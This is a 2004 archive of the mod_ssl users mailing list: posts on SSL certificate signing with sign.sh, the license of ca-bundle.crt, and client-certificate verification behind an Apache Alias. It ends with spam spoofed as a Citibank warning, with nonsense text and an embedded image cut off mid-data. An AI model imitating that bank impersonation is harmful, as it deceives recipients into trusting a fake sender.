`localhost.localdomain' does NOT match server name!? [Tue Jun 15 15:26:34
2004] [error] [client 10.14.1.150] Invalid method in request
I have also been able to successfully run the command 'curl
https://eghapp'. However when I try to run 'https://eghapp' through the
browser I get an error saying that the DNS server cannot be found. On
checking the nothing gets written to any of the ssl log files. Does anyone
know how I can resolve this?
Thanks
Richard Skeggs
Software Engineer
Mobius Management Systems
Cavendish House
5 The Avenue
Egham
Surrey
TW20 9AB
Tel: +44 (0) 1784 484700
Mobile: + 44 (0) 7971 608315
email: rskeggs@mobius.com

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission. If
you receive this message in error, please notify the sender urgently and
then immediately delete the message and any copies of it from your system.
Please also immediately destroy any hardcopies of the message. You must
not, directly or indirectly, use, disclose, distribute, print, or copy any
part of this message if you are not the intended recipient. The sender's
company reserves the right to monitor all e-mail communications through
their networks. Any views expressed in this message are those of the
individual sender, except where the message states otherwise and the
sender is authorised to state them to be the views of the sender's
company.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 16 22:10:20 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4A8D9A8A55; Wed, 16 Jun 2004 22:10:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx-old.j10n.org (203.141.155.228.user.ca.il24.net [203.141.155.228])
	by master.modssl.org (Postfix) with ESMTP id C87CDA8943
	for ; Wed, 16 Jun 2004 22:09:59 +0200 (CEST)
Received: from korea.j10n.org.j10n.org (korea.j10n.org [IPv6:2002:cb8d:9be4:1:203:93ff:feef:5060])
	(authenticated bits=0)
	by mx-old.j10n.org (8.12.9p2/8.12.9) with ESMTP id i5GK9UMZ026344
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO);
	Thu, 17 Jun 2004 05:09:33 +0900 (JST)
	(envelope-from shinra@j10n.org)
Date: Thu, 17 Jun 2004 05:09:31 +0900
Message-ID: 
From: AIDA Shinra 
To: modssl-users@modssl.org
Subject: Again: "License" of ca-bundle.crt
User-Agent: Wanderlust/2.10.1 (Watching The Wheels) SEMI/1.14.6 (Maruoka) FLIM/1.14.6 (Marutamachi) APEL/10.6 MULE XEmacs/21.4 (patch 15) (Security Through Obscurity) (powerpc-apple-darwin7.2.0)
MIME-Version: 1.0 (generated by SEMI 1.14.6 - "Maruoka")
Content-Type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: AIDA Shinra 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I am packaging sole ca-bundle.crt for Fink.
http://sourceforge.net/tracker/index.php?func=detail&aid=928157&group_id=17203&atid=414256

Fink package system has "License" field. I must fill it. What is the
"license" of sole ca-bundle.crt? Mod_ssl license? Or nothing like
"license"?

I sent before but no response except "vacation". Before clarifying it
I can't take any action.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jun 16 22:27:21 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BDB6BA8995; Wed, 16 Jun 2004 22:27:21 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 21E8AA8943
	for ; Wed, 16 Jun 2004 22:27:03 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.10/8.12.10) with ESMTP id i5GKQie1003799;
	Wed, 16 Jun 2004 16:26:44 -0400
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id i5GKQh000713;
	Wed, 16 Jun 2004 16:26:43 -0400
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.10/8.12.7) with ESMTP id i5GKQg7m013134;
	Wed, 16 Jun 2004 21:26:42 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.10/8.12.10/Submit) id i5GKQfRE013133;
	Wed, 16 Jun 2004 21:26:41 +0100
Date: Wed, 16 Jun 2004 21:26:41 +0100
From: Joe Orton 
To: AIDA Shinra 
Cc: modssl-users@modssl.org
Subject: Re: Again: "License" of ca-bundle.crt
Message-ID: <20040616202641.GA13126@redhat.com>
Mail-Followup-To: AIDA Shinra ,
	modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Jun 17, 2004 at 05:09:31AM +0900, AIDA Shinra wrote:
> Hello,
> 
> I am packaging sole ca-bundle.crt for Fink.
> http://sourceforge.net/tracker/index.php?func=detail&aid=928157&group_id=17203&atid=414256
> 
> Fink package system has "License" field. I must fill it. What is the
> "license" of sole ca-bundle.crt? Mod_ssl license? Or nothing like
> "license"?

It's a tricky legal question, I think.

The original source of the ca-bundle.crt was a database shipped with the
Netscape browser.  It's possible to derive a new ca-bundle.crt from the
Mozilla source code, which is what Debian do in their ca-certificates
package.  Debian say that the resultant CA certificate bundle is
licensed under the MPL, as its source in Mozilla is.

But can a database be copyrighted?  Can a database made up of copies of
necessarily-public CA certificates published by third parties be
copyrighted?  It is somewhat lacking in "originality", which is one of
the requirements for US copyright law to apply, at least.

You may be better of asking a lawyer, unfortunately!

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 17 07:38:20 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6F090A8A55; Thu, 17 Jun 2004 07:38:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from outmx004.isp.belgacom.be (outmx004.isp.belgacom.be [195.238.2.101])
	by master.modssl.org (Postfix) with ESMTP id 59940A8940
	for ; Thu, 17 Jun 2004 07:38:12 +0200 (CEST)
Received: from outmx004.isp.belgacom.be (localhost [127.0.0.1])
        by outmx004.isp.belgacom.be (8.12.11/8.12.11/Skynet-OUT-2.22) with ESMTP id i5H5bw5u014793
        for ; Thu, 17 Jun 2004 07:37:58 +0200
        (envelope-from )
Received: from hobbywan (91.73-136-217.adsl.skynet.be [217.136.73.91])
        by outmx004.isp.belgacom.be (8.12.11/8.12.11/Skynet-OUT-2.22) with ESMTP id i5H5bsnU014768
        for ; Thu, 17 Jun 2004 07:37:54 +0200
        (envelope-from )
From: "Thierry Cabuzel" 
To: 
Subject: RE: Again: "License" of ca-bundle.crt
Date: Thu, 17 Jun 2004 07:37:56 +0200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="utf-8"
Content-Transfer-Encoding: quoted-printable
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0)
In-Reply-To: <20040616202641.GA13126@redhat.com>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Thierry Cabuzel" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> > -----Message d'origine-----
> > De : owner-modssl-users@modssl.org
> > Envoy=C3=A9 : mercredi 16 juin 2004 22:27
> > =C3=80 : AIDA Shinra
> > Cc : modssl-users@modssl.org
> > Objet : Re: Again: "License" of ca-bundle.crt
> >=20
> >=20
> > On Thu, Jun 17, 2004 at 05:09:31AM +0900, AIDA Shinra wrote:
> > > Hello,
> > >=20
> > > I am packaging sole ca-bundle.crt for Fink.
> > >=20
> > =
http://sourceforge.net/tracker/index.php?func=3Ddetail&aid=3D928157&gr
> oup_id=3D17203&atid=3D414256
> >=20
> > Fink package system has "License" field. I must fill it. What is the
> > "license" of sole ca-bundle.crt? Mod_ssl license? Or nothing like
> > "license"?
>=20
> It's a tricky legal question, I think.
>=20
> The original source of the ca-bundle.crt was a database shipped with =
the
> Netscape browser.  It's possible to derive a new ca-bundle.crt from =
the
> Mozilla source code, which is what Debian do in their ca-certificates
> package.  Debian say that the resultant CA certificate bundle is
> licensed under the MPL, as its source in Mozilla is.
>=20
> But can a database be copyrighted?  Can a database made up of copies =
of
> necessarily-public CA certificates published by third parties be
> copyrighted?  It is somewhat lacking in "originality", which is one of
> the requirements for US copyright law to apply, at least.
>=20
> You may be better of asking a lawyer, unfortunately!
>=20
> joe

I am not american, but if I remember correctly, as an american you can
copyright a database. The length is 20, 25 or 50 years protection but I =
don't=20
remember.
And Yes, you can copyright a database with certificates as you can =
copyright
a database with the name of those who live in your town. It is not =
because=20
the datas are public that the database can't be copyrighted...

Thierry

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 17 11:24:08 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9EAFCA8975; Thu, 17 Jun 2004 11:24:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from puzzle.pobox.com (puzzle.pobox.com [207.8.214.3])
	by master.modssl.org (Postfix) with ESMTP id 3148EA893B
	for ; Thu, 17 Jun 2004 11:23:52 +0200 (CEST)
Received: from localhost.localdomain (localhost [127.0.0.1])
	by puzzle.pobox.com (Postfix) with ESMTP
	id CF2061391E1; Thu, 17 Jun 2004 05:23:24 -0400 (EDT)
Received: from DParis1 (unknown [65.73.239.18])
	by puzzle.pobox.com (Postfix) with ESMTP
	id 453BE139186; Thu, 17 Jun 2004 05:23:24 -0400 (EDT)
From: "Dave Paris" 
To: , "AIDA Shinra" 
Subject: RE: Again: "License" of ca-bundle.crt
Date: Thu, 17 Jun 2004 05:21:34 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="utf-8"
Content-Transfer-Encoding: quoted-printable
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
In-Reply-To: <20040616202641.GA13126@redhat.com>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dave Paris" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Yes, without equivocation, databases can be protected by copyright.  I =
do agree with Joe about the originality and creativity requirement, =
since this is necessary public information.

Much better information:
http://www.bitlaw.com/copyright/database.html

Kind Regards,
-dsp

> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Joe Orton
> Sent: Wednesday, June 16, 2004 4:27 PM
> To: AIDA Shinra
> Cc: modssl-users@modssl.org
> Subject: Re: Again: "License" of ca-bundle.crt
>=20
>=20
> On Thu, Jun 17, 2004 at 05:09:31AM +0900, AIDA Shinra wrote:
> > Hello,
> >=20
> > I am packaging sole ca-bundle.crt for Fink.
> >=20
> http://sourceforge.net/tracker/index.php?func=3Ddetail&aid=3D928157&gr
> oup_id=3D17203&atid=3D414256
> >=20
> > Fink package system has "License" field. I must fill it. What is the
> > "license" of sole ca-bundle.crt? Mod_ssl license? Or nothing like
> > "license"?
>=20
> It's a tricky legal question, I think.
>=20
> The original source of the ca-bundle.crt was a database shipped with =
the
> Netscape browser.  It's possible to derive a new ca-bundle.crt from =
the
> Mozilla source code, which is what Debian do in their ca-certificates
> package.  Debian say that the resultant CA certificate bundle is
> licensed under the MPL, as its source in Mozilla is.
>=20
> But can a database be copyrighted?  Can a database made up of copies =
of
> necessarily-public CA certificates published by third parties be
> copyrighted?  It is somewhat lacking in "originality", which is one of
> the requirements for US copyright law to apply, at least.
>=20
> You may be better of asking a lawyer, unfortunately!
>=20
> joe
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>=20
>=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 17 18:44:13 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 09781A8A59; Thu, 17 Jun 2004 18:44:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.pobox.co.uk (ws.pobox.co.uk [217.27.240.72])
	by master.modssl.org (Postfix) with ESMTP id A8139A893B
	for ; Thu, 17 Jun 2004 18:43:56 +0200 (CEST)
Received: from localhost ([127.0.0.1] helo=mail.pobox.co.uk)
	by mail.pobox.co.uk with smtp (Exim 4.31)
	id 1BazzK-0005mA-KL
	for modssl-users@modssl.org; Thu, 17 Jun 2004 17:43:42 +0100
Received: from uk.mobius.com ([204.126.130.14])
        (SquirrelMail authenticated user rskeggs)
        by mail.pobox.co.uk with HTTP;
        Thu, 17 Jun 2004 17:43:42 +0100 (BST)
Message-ID: <58738.204.126.130.14.1087490622.squirrel@mail.pobox.co.uk>
Date: Thu, 17 Jun 2004 17:43:42 +0100 (BST)
Subject: More certificate problems
From: "richard skeggs" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.1
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "richard skeggs" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am having problems signing the certificate

I can successfully generate the RSA private key using the command
openssl genrsa -des3 -out server.key 1024

I can a CSR file using
openssl req -new -key server.key -out server.csr

I can even generate the RSA frivate key for the CA
openssl genrsa -des3 -out ca.key 1024

I have even created the self sign certificate using
openssl req -new -x509 -days 365 -key ca.key -out ca.crt

When I try and run the shell script sign.sh I get as far as
Sign the certificate? [y/n]
to which I answer 'y'

The reply i get back from the script is

'failed to update database'
'TT_DB error number 2'
'unable to load certificate'
'16129:error:0906D06C:PEM routines:PEM_read_bio: no start
line:pem_lib.c:632 Expecting TRUSTED CERTIFICATE'

I obviously find that the server.crt is empty. I would appreciate some
help with this problem

Thanks

Richard Skeggs




The sign.sh shell script I am using is shown below

#!/bin/sh
         ##
         ##  sign.sh -- Sign a SSL Certificate Request (CSR)
         ##  Copyright (c) 1998-1999 Ralf S. Engelschall, All Rights
Reserved.
         ##

         #   argument line handling
         CSR=$1
         if [ $# -ne 1 ]; then
         echo "Usage: sign.sign .csr"; exit 1
         fi
         if [ ! -f $CSR ]; then
         echo "CSR not found: $CSR"; exit 1
         fi
         case $CSR in
         *.csr ) CERT="`echo $CSR | sed -e 's/\.csr/.crt/'`" ;;
         * ) CERT="$CSR.crt" ;;
         esac

         #   make sure environment exists
         if [ ! -d ca.db.certs ]; then
         mkdir ca.db.certs
         fi
         if [ ! -f ca.db.serial ]; then
         echo '01' >ca.db.serial
         fi
         if [ ! -f ca.db.index ]; then
         cp /dev/null ca.db.index
         fi

         #   create an own SSLeay config
         cat >ca.config < $CERT:"
         openssl ca -config ca.config -out $CERT -infiles $CSR
         echo "CA verifying: $CERT <-> CA cert"
         openssl verify -CAfile /etc/ssl/certs/ca.crt $CERT

         #  cleanup after SSLeay
         rm -f ca.config
         rm -f ca.db.serial.old
         rm -f ca.db.index.old

         #  die gracefully
         exit 0


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 18 16:04:04 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1A5A4A8940; Fri, 18 Jun 2004 16:04:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from GAEA.intra.cee-kay.net (wall.cee-kay.net [62.212.76.5])
	by master.modssl.org (Postfix) with ESMTP id 19975A8933
	for ; Fri, 18 Jun 2004 16:03:48 +0200 (CEST)
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C4553D.052A70D0"
Subject: SSLVerifyClient and apache Alias
X-MimeOLE: Produced By Microsoft Exchange V6.5.6944.0
Date: Fri, 18 Jun 2004 16:03:24 +0200
Message-ID: <856BF27B631B9847A9AD0DDB5356DEB011AFA2@GAEA.intra.cee-kay.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSLVerifyClient and apache Alias
Thread-Index: AcRVPQUUfI4vlduHTVy1WwUfmnnZzA==
From: "Tom Duijf" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tom Duijf" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C4553D.052A70D0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hello,
=20
We're setting up a site with client authentication and are using apache
1.3 and mod_ssl for that.
=20
We are using the apache alias command to make all requests to a certain
url pass through a php script.
The web dir where the script is located is protected by SSLVerifyClient
require.
=20
When i address a directory beyond the alias definition (which then is
passed through the php script), the client will get a SSL certificate
selection box.
When i authenticate with a correct SSL client cert, all is well,
everything works as it should work.
When i authenticate with a wrong SSL client cert, i *should* get a
forbidden, page not found or something alike.
=20
The problem is the folowing:
In this last example, i DO get the page in front of me, but only the
first time, on a refresh/reload of the page i get a forbidden.
It seems that only the initial request with a wrong certificate is
allowed to the apache Alias, after that everything is denied.
=20
Here is a small piece of my configuration.
=20
 Alias   /protected/dynamic
/website/docroot/protected/dynamic/index.php

        SSLVerifyClient require
        SSLVerifyDepth  2


Without the alias definition, everything does work as it should. The
alias definition is the causing the problem (but we kind of need it).
Am i doing something wrong? does the Alias definition need special
treatment within the ssl config?
=20
Regards,
Tom Duijf
Cee-Kay

------_=_NextPart_001_01C4553D.052A70D0
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable







Hello,


 


We're =
setting up a=20
site with client authentication and are using apache 1.3 and mod_ssl for =

that.


 


We are =
using the=20
apache alias command to make all requests to a certain url pass through =
a php=20
script.


The =
web dir where=20
the script is located is protected by SSLVerifyClient=20
require.


 


When i =
address a=20
directory beyond the alias definition (which then is passed through the =
php=20
script), the client will get a SSL certificate selection=20
box.


When i =
authenticate=20
with a correct SSL client cert, all is well, everything works as it =
should=20
work.


When i =
authenticate=20
with a wrong SSL client cert, i *should* get a forbidden, page not found =
or=20
something alike.




 


The =
problem is the=20
folowing:


In =
this last=20
example, i DO get the page in front of me, but only the first time, on a =

refresh/reload of the page i get a forbidden.


It =
seems that only=20
the initial request with a wrong certificate is allowed to the apache =
Alias,=20
after that everything is denied.


 


Here =
is a small=20
piece of my configuration.


 


 Alias   =
/protected/dynamic =20
 /website/docroot/protected/dynamic/index.php


<Directory=20
/website/docroot/protected>
      &nb=
sp;=20
SSLVerifyClient require
       =20
SSLVerifyDepth  2
</Directory>


Without the alias=20
definition, everything does work as it should. The alias definition is =
the=20
causing the problem (but we kind of need it).


Am i =
doing something=20
wrong? does the Alias definition need special treatment within the ssl=20
config?


 


Regards,


Tom=20
Duijf


Cee-Kay


------_=_NextPart_001_01C4553D.052A70D0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From user-supports11@citibank.com  Sat Jun 19 22:50:17 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from host232-140.pool80180.interbusiness.it (host232-140.pool80180.interbusiness.it [80.180.140.232])
	by master.modssl.org (Postfix) with SMTP id 80C4AA8940
	for ; Sat, 19 Jun 2004 22:49:59 +0200 (CEST)
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
FCC: mailbox://user-supports11@citibank.com/Sent
X-Identity-Key: id1
Date: Sat, 19 Jun 2004 17:45:56 -0400
From: Citibank 
X-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; uuencode=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users-l@master.modssl.org
Subject: !Warning all Citibank users
Content-Type: multipart/related;
 boundary="------------090305010409010705050006"
Message-Id: <20040619204959.80C4AA8940@master.modssl.org>

This is a multi-part message in MIME format.
--------------090305010409010705050006
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit


Movies in 1855 Which one? in 2000 Mad Cow Disease 


--------------090305010409010705050006
Content-Type: image/gif;
 name="congressional.GIF"
Content-Transfer-Encoding: base64
Content-ID: 
Content-Disposition: inline;
 filename="congressional.GIF"

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
